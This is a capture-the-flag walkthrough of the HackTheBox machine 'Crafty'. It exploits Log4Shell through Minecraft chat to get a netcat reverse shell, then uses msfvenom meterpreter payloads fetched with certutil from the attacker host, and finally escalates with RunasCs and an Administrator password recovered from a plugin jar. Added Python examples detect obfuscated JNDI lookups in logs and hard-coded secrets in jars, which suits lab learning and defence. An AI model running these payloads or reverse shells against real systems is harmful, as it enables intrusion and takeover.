nmap 10.10.11.249 -p-
sudo nmap -p80,25565 -sV -sC 10.10.11.249
I add crafty.htb to /etc/hosts with the box's IP address, then navigate to http://crafty.htb:
echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts
When I visited crafty.htb, I found a Minecraft introduction page.
However, for port 25565 (the Minecraft server), I recall there being a Log4j vulnerability, CVE-2021-44228 (Log4Shell) to be precise. Vulnerable Log4j 2 versions resolve ${jndi:...} lookups inside the messages they log, so anyone whose input ends up in a log line (a chat message, in this case) can make the server fetch and load a class from an attacker-controlled LDAP/HTTP server, which gives arbitrary code execution. A proof of concept for this vulnerability can be found here:
git clone https://github.com/kozmer/log4j-shell-poc
Modify the String cmd variable in the Exploit.java template embedded in poc.py so that the payload spawns cmd.exe instead of /bin/sh, since the target is Windows.
For poc.py to run, the JDK it uses to compile the payload class must sit in a directory named jdk1.8.0_20 (compiling with a Java 8 javac also avoids producing a class file newer than the target JVM can load). I found a Java 8 archive here:
wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -xf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20
To connect to the server, I needed a Minecraft client on my Kali system. After some research, I downloaded TLauncher: https://tlauncher.org/en/download_1/minecraft-1-16-5_12582.html (I don't recommend using this, but I proceeded anyway since I'm installing it in a VM.) I used Minecraft 1.16.5 Java Edition, which I knew to be affected by the Log4j vulnerability.
Once you have downloaded the TLauncher.zip file, unzip it and open it by running the command below:
sudo java -jar TLauncher.jar
After that, select the correct release version, fill in a Minecraft account name, then proceed with Enter the game.
Clicking on Multiplayer allowed me to enter the server at:
10.10.11.249:25565
I had to attempt logging in to the server multiple times, and each time I had to reset the box for it to work properly. Once logged in to the server, I opened a terminal and ran the PoC. It starts the malicious LDAP server (port 1389) and the web server that hosts the payload class, and prints the lookup string to send (${jndi:ldap://10.10.16.18:1389/a}); I copied that.
python3 poc.py --userip <tun0 IP> --webport 80 --lport 4444
Then, in another terminal, create a netcat listener on port 4444:
nc -nlvp 4444
Then in Minecraft I press t (to open the chat) and paste the copied lookup string (${jndi:ldap://10.10.16.18:1389/a}) into the chat box. The server logs the chat message, Log4j resolves the lookup against the PoC's LDAP server and loads the payload class, and within a few seconds I got the reverse shell in my netcat listener.
In the screenshot below you can see the whole process:
So now we can obtain the user.txt
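The chat message works because the server writes it to its log and Log4j 2 resolves the ${jndi:...} lookup inside it. From the defender's side, that same lookup syntax is what to hunt for in server logs, including the nested-lookup obfuscations (${lower:...}, ${upper:...}, ${anything:-literal}) attackers use to evade a plain ${jndi: match. The following is an added example (my own code, not from the original write-up or from the PoC repository) that normalizes those lookups the way Log4j's substitutor would and runs the check over a few constructed Minecraft server log lines; the log lines and the player name are made up for the demonstration.

```python
import re

# Innermost lookups whose value an attacker controls completely:
#   ${lower:X} / ${upper:X}   -> case-converted X
#   ${anything:-X}            -> default value X (e.g. ${::-j}, ${env:NOPE:-j})
_INNER = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested Log4j lookups to the string they would evaluate to.

    Resolution is innermost-first, like Log4j's StrSubstitutor, and stops
    when nothing changes or after max_rounds (guard against pathological input).
    """
    def _resolve(m: re.Match) -> str:
        if m.group(1) == "lower":
            return m.group(2).lower()
        if m.group(1) == "upper":
            return m.group(2).upper()
        return m.group(3)

    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return (line_no, normalized_line) for every line that looks like a Log4Shell probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_log4shell_probe(line):
            hits.append((n, normalize_lookups(line)))
    return hits


# Constructed sample of a Minecraft server log (not real traffic): a benign chat
# line, the PoC's plain payload, two obfuscated variants and a harmless lookup.
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <steve> hello world",
    "[12:00:05] [Server thread/INFO]: <steve> ${jndi:ldap://10.10.16.18:1389/a}",
    "[12:00:09] [Server thread/INFO]: <steve> ${${lower:J}${::-n}di:ldap://10.10.16.18:1389/a}",
    "[12:00:12] [Server thread/INFO]: <steve> ${${env:NOPE:-j}ndi:${::-l}dap://10.10.16.18:1389/a}",
    "[12:00:15] [Server thread/INFO]: <steve> date is ${date:yyyy}",
]

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

Matching on the normalized string rather than the raw one is the point: a rule that only looks for the literal ${jndi: misses lines 3 and 4 of the sample, while this check reports lines 2, 3 and 4 and leaves the harmless ${date:yyyy} alone.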
While exploring the machine, I stumbled upon an interesting .jar file in C:\Users\svc_minecraft\server\plugins. With my current shell I can't download the file, so I followed the steps below:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4244 -f exe -o exploit.exe
I then fired up Metasploit and did the following:
sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4244
run
Then spin up a Python web server in a separate tab to deliver exploit.exe:
python3 -m http.server 4245
Then run the command below in the foothold shell. It fetches exploit.exe from the Python web server and writes it to the target's temp directory:
certutil -urlcache -f http://10.10.16.18:4245/exploit.exe %temp%/exploit.exe
Then run exploit.exe:
start %temp%/exploit.exe
BOOM! We got a stable shell through Meterpreter, so now we can download the jar file with Meterpreter's download command.
To find out what is in this file we need a Java decompiler. JD-GUI is available from the Kali repositories:
sudo apt install jd-gui
Running jd-gui opens the decompiler. Click File in the menu bar, then Open File, find the .jar file and open it.
Opening this file with JD-GUI, I found a credential in Playercounter.class.
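JD-GUI is the interactive way to inspect one plugin; when there are many jars to triage, the same information can be pulled programmatically. A hard-coded credential in compiled Java ends up as a CONSTANT_String entry in the class file's constant pool, which distinguishes it from identifiers such as a field named password (a CONSTANT_Utf8 entry that no CONSTANT_String points at). The following added example (my own code, not part of the original write-up and not the actual Playercounter plugin) parses the constant pool of every class inside a jar and flags string literals that look like passwords. The Playercounter.class it scans is a minimal class file constructed in memory with a placeholder literal, not the real plugin from the box.

```python
import io
import re
import struct
import zipfile

MAGIC = b"\xca\xfe\xba\xbe"
# Bytes following the 1-byte tag for the fixed-size constant pool entry types.
_FIXED = {3: 4, 4: 4, 7: 2, 9: 4, 10: 4, 11: 4, 12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool(data: bytes):
    """Walk a class file's constant pool.

    Returns (utf8, string_refs): utf8 maps pool index -> CONSTANT_Utf8 text and
    string_refs lists the Utf8 indices referenced by CONSTANT_String entries,
    i.e. the string literals the code actually uses.
    """
    if data[:4] != MAGIC:
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", data, 8)   # after magic, minor, major
    pos, idx = 10, 1
    utf8, string_refs = {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                                # CONSTANT_Utf8
            (length,) = struct.unpack_from(">H", data, pos)
            pos += 2
            utf8[idx] = data[pos:pos + length].decode("utf-8", "replace")
            pos += length
        elif tag == 8:                              # CONSTANT_String -> Utf8 index
            (ref,) = struct.unpack_from(">H", data, pos)
            pos += 2
            string_refs.append(ref)
        elif tag in (5, 6):                         # Long/Double take two slots
            pos += 8
            idx += 1
        elif tag in _FIXED:
            pos += _FIXED[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 1
    return utf8, string_refs


def string_literals(class_bytes: bytes):
    utf8, refs = constant_pool(class_bytes)
    return [utf8[r] for r in refs if r in utf8]


# Heuristic for a hard-coded secret: 8+ non-space chars mixing letters and digits.
_SECRET = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)\S{8,}$")


def jar_literals(jar_bytes: bytes):
    """Map each .class entry in the jar to its string literals."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                result[name] = string_literals(jar.read(name))
    return result


def suspicious_literals(jar_bytes: bytes):
    """Only the classes and literals that match the secret heuristic."""
    hits = {}
    for name, lits in jar_literals(jar_bytes).items():
        found = [s for s in lits if _SECRET.match(s)]
        if found:
            hits[name] = found
    return hits


# --- Constructed fixture: a minimal class file and jar built in memory ---
def _u2(n): return struct.pack(">H", n)
def _utf8(s): b = s.encode(); return b"\x01" + _u2(len(b)) + b
def _class(i): return b"\x07" + _u2(i)
def _string(i): return b"\x08" + _u2(i)


def build_sample_class() -> bytes:
    """Bare Playercounter class with a placeholder password literal (constructed, not the real plugin)."""
    pool = [
        _utf8("Playercounter"), _class(1),                  # 1, 2: this class
        _utf8("java/lang/Object"), _class(3),               # 3, 4: super class
        _utf8("password"), _utf8("Ljava/lang/String;"),     # 5, 6: field name/descriptor (identifiers)
        _utf8("Ex4mpleP4ssw0rd"), _string(7),               # 7, 8: the literal we want to find
        _utf8("localhost"), _string(9),                     # 9, 10: a benign literal
        _utf8("<init>"), _utf8("()V"),                      # 11, 12
    ]
    return (MAGIC + _u2(0) + _u2(52) + _u2(len(pool) + 1) + b"".join(pool)
            + _u2(0x0021) + _u2(2) + _u2(4)                 # access flags, this_class, super_class
            + _u2(0) * 4)                                   # no interfaces, fields, methods, attributes


def build_sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("htb/crafty/Playercounter.class", build_sample_class())
    return buf.getvalue()


if __name__ == "__main__":
    for cls, lits in suspicious_literals(build_sample_jar()).items():
        print(cls, lits)
```

Reporting only Utf8 entries that a CONSTANT_String points at keeps method and field names out of the output, so the field name password is not listed while the literal assigned to it is; on a real plugin, replace build_sample_jar() with the bytes of the downloaded .jar.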
Now we are going to use RunasCs, which allows us to run a process under different credentials than the ones we currently have. The goal is to start an Administrator shell from our current user svc_minecraft.
https://github.com/antonioCoco/RunasCs/releases
Download the version 1.5 RunasCs.zip from the release page above and unzip it. We are going to use RunasCs.exe for this box.
Now create another msfvenom payload, this time for port 4246:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4246 -f exe -o exploit2.exe
On the Meterpreter session you can try uploading to \server\plugins, but it won't work because of permissions. We need to move over to \server\logs, which svc_minecraft can write to, so we can upload the new payload exploit2.exe and RunasCs.exe there.
Open a new tab and launch Metasploit. Repeat the listener setup from the previous Metasploit segment, this time on port 4246:
sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4246
run
Returning to our previous Meterpreter shell (in \server\logs, where both files were uploaded), execute the following command, which runs exploit2.exe as Administrator with the password recovered from Playercounter.class:
.\RunasCs.exe Administrator s67u84zKq8IXw exploit2.exe
BOOM!! We got the Administrator shell on the port 4246 handler, as well as the root flag!